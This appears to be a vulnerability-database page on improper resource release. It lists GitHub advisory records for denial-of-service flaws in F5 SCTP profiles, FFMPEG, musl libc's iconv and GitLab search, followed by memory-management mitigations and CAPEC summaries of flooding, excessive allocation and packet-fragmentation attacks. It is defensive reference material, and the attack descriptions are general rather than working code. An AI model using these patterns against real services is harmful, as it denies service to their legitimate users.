When a Stream Control Transmission Protocol (SCTP) profile is configured on a virtual server, undisclosed requests can cause an increase in memory resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41399"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-07T22:15:20Z",
    "severity": "HIGH"
  },
  "details": "When a Stream Control Transmission Protocol (SCTP) profile is configured on a virtual server, undisclosed requests can cause an increase in memory resource utilization.\u00a0Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.",
  "id": "GHSA-2ppg-9297-h3vc",
  "modified": "2025-05-08T00:31:12Z",
  "published": "2025-05-08T00:31:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41399"
    },
    {
      "type": "WEB",
      "url": "https://my.f5.com/manage/s/article/K000137709"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-2Q9X-4W37-QXHQ

Vulnerability from github – Published: 2022-05-17 01:22 – Updated: 2022-05-17 01:22
VLAI
Details

Unspecified vulnerability in FFMPEG 0.10 allows remote attackers to cause a denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2012-2805"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-08-28T15:29:00Z",
    "severity": "HIGH"
  },
  "details": "Unspecified vulnerability in FFMPEG 0.10 allows remote attackers to cause a denial of service.",
  "id": "GHSA-2q9x-4w37-qxhq",
  "modified": "2022-05-17T01:22:10Z",
  "published": "2022-05-17T01:22:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2805"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.9269"
    },
    {
      "type": "WEB",
      "url": "https://www.ffmpeg.org/security.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2QH3-3RMV-X43W

Vulnerability from github – Published: 2026-04-10 09:31 – Updated: 2026-04-10 12:31
VLAI
Details

A security flaw has been discovered in musl libc up to 1.2.6. Affected is the function iconv of the file src/locale/iconv.c of the component GB18030 4-byte Decoder. Performing a manipulation results in inefficient algorithmic complexity. The attack must be initiated from a local position. To fix this issue, it is recommended to deploy a patch.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-6042"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-10T09:16:25Z",
    "severity": "MODERATE"
  },
  "details": "A security flaw has been discovered in musl libc up to 1.2.6. Affected is the function iconv of the file src/locale/iconv.c of the component GB18030 4-byte Decoder. Performing a manipulation results in inefficient algorithmic complexity. The attack must be initiated from a local position. To fix this issue, it is recommended to deploy a patch.",
  "id": "GHSA-2qh3-3rmv-x43w",
  "modified": "2026-04-10T12:31:44Z",
  "published": "2026-04-10T09:31:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6042"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/796352"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/356620"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/356620/cti"
    },
    {
      "type": "WEB",
      "url": "https://www.openwall.com/lists/oss-security/2026/04/02/10"
    },
    {
      "type": "WEB",
      "url": "https://www.openwall.com/lists/oss-security/2026/04/03/2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/04/09/19"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-2QVV-WF53-7C44

Vulnerability from github – Published: 2022-05-24 17:36 – Updated: 2022-05-24 17:36
VLAI
Details

A potential DOS vulnerability was discovered in all versions of Gitlab starting from 13.4.x (>=13.4 to <13.4.7, >=13.5 to <13.5.5, and >=13.6 to <13.6.2). Using a specific query name for a project search can cause statement timeouts that can lead to a potential DOS if abused.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-26411"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-12-11T05:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A potential DOS vulnerability was discovered in all versions of Gitlab starting from 13.4.x (\u003e=13.4 to \u003c13.4.7, \u003e=13.5 to \u003c13.5.5, and \u003e=13.6 to \u003c13.6.2). Using a specific query name for a project search can cause statement timeouts that can lead to a potential DOS if abused.",
  "id": "GHSA-2qvv-wf53-7c44",
  "modified": "2022-05-24T17:36:02Z",
  "published": "2022-05-24T17:36:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26411"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26411.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/260330"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation MIT-3
Requirements

Strategy: Language Selection

  • Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated.
Mitigation
Implementation

It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free memory in a function. If you allocate memory that you intend to free upon completion of the function, you must be sure to free the memory at all exit points for that function including error conditions.

Mitigation
Implementation

Memory should be allocated/freed using matching functions such as malloc/free, new/delete, and new[]/delete[].

Mitigation
Implementation

When releasing a complex object or structure, ensure that you properly dispose of all of its member components, not just the object itself.

CAPEC-125: Flooding

An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.

CAPEC-130: Excessive Allocation

An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.

CAPEC-131: Resource Leak Exposure

An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.

CAPEC-494: TCP Fragmentation

An adversary may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules of network controls, by attempting to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered.

CAPEC-495: UDP Fragmentation

An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.

CAPEC-496: ICMP Fragmentation

An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.

CAPEC-666: BlueSmacking

An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. This attack must be carried out within close proximity to a Bluetooth enabled device.